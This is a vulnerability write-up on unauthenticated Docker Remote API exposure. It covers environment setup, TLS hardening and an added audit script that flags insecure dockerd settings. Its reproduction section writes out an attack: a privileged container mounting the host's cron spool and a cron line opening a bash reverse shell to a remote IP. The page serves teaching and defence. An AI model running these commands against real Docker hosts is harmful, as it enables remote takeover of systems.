
# Docker Unauthorized Access Vulnerability

## Vulnerability Description

An attacker can reach the Docker daemon or its containers without any authentication. This can expose sensitive data, or let the attacker perform unauthorized operations such as creating, modifying, or deleting containers.

## Environment Setup

Install Docker:

```
yum install -y docker
```

Edit the `/usr/lib/systemd/system/docker.service` unit so that the daemon also listens on the TCP API port:

```
ExecStart=/usr/local/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
```

![image-20220726104747298](/files/1Umfabj7XbGcgW1F2tJQ)

Restart the Docker service:

```
systemctl daemon-reload
systemctl restart docker
```

![image-20220726104829456](/files/yw4V4eXderVGTKDmlUBM)

## Reproducing the Vulnerability

Requesting `ip:2375/version` returns the daemon's basic information, the same output as the `docker version` command.

![image-20220726104904921](/files/nqUnyZQfJIdI15ct6ZnU)

**Writing a cron job from a Docker container to get a reverse shell**

Through the unauthenticated Docker Remote API we can start a container and mount host directories into it, which gives us arbitrary read and write access on the host. We then write a reverse-shell command into the host's crontab, and the host spawns a reverse shell.

```
[root@localhost ~]# docker -H tcp://192.168.32.183:2375 run -it --user root --privileged -v /var/spool/cron/:/var/spool/cron/ alpine sh
```

Write the scheduled task:

```
/ # echo '* * * * * bash -i >& /dev/tcp/192.168.32.130/8088 0>&1' >> /var/spool/cron/root
```

![image-20220726110359885](/files/CAFGcudfhf7aX5wG7QUT)

## Hardening

Do not enable the Docker Remote API unless it is required. If it must be used, harden it as follows:

- Set an ACL so that only trusted source IPs can connect.
- Enable TLS authentication; the official documentation for this is *Protect the Docker daemon socket*.

After the client and server certificates have been generated, start the Docker daemon with the following command (old Docker releases spelled the daemon binary `docker -d`; current releases use `dockerd`):

```
dockerd --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=tcp://10.10.10.10:2375 -H unix:///var/run/docker.sock
```

On the client side, set the following environment variables before connecting:

```
export DOCKER_TLS_VERIFY=1
export DOCKER_CERT_PATH=~/.docker
export DOCKER_HOST=tcp://10.10.10.10:2375
export DOCKER_API_VERSION=1.12
```
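The following audit helper is an added example, not part of the original page: it classifies a `dockerd` command line (for instance the `ExecStart=` value of `docker.service`) as a local-only socket, a TLS-verified TCP listener, or the unauthenticated TCP exposure described above. The sample lines and the function names are constructed for this example.

```shell
#!/bin/sh
# Added audit helper, not part of the original page.
# Classifies a dockerd command line by how it exposes the Remote API:
#   LOCAL    - no tcp:// listener, only the unix socket
#   TLS      - tcp:// listener with --tlsverify (client certificates required)
#   INSECURE - tcp:// listener without --tlsverify (the unauthenticated setup above)
audit_dockerd_cmdline() {
    cmdline="$1"
    # -H tcp://..., -H=tcp://... and --host=tcp://... all open a TCP listener
    if ! printf '%s\n' "$cmdline" | grep -Eq -- '(-H|--host)[= ]*tcp://'; then
        echo LOCAL
        return 0
    fi
    # A TCP listener is only acceptable when the daemon verifies client certs
    if printf '%s\n' "$cmdline" | grep -q -- '--tlsverify'; then
        echo TLS
        return 0
    fi
    echo INSECURE
    return 1
}

# Reads the first ExecStart= line of a systemd unit file and audits it.
audit_docker_service_file() {
    unit="$1"
    line=$(grep -m1 '^ExecStart=' "$unit") || {
        echo "no ExecStart= line in $unit" >&2
        return 2
    }
    audit_dockerd_cmdline "$line"
}

# Constructed samples mirroring the weak and hardened daemon lines on this page.
WEAK_EXECSTART='ExecStart=/usr/local/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock'
TLS_EXECSTART='ExecStart=/usr/bin/dockerd --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=tcp://10.10.10.10:2375 -H unix:///var/run/docker.sock'

audit_dockerd_cmdline "$WEAK_EXECSTART" || :   # prints INSECURE
audit_dockerd_cmdline "$TLS_EXECSTART"         # prints TLS
# On a real host: audit_docker_service_file /usr/lib/systemd/system/docker.service
```

The non-zero exit status of `audit_dockerd_cmdline` for the INSECURE case lets the check be dropped into a configuration-compliance job without parsing its output.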
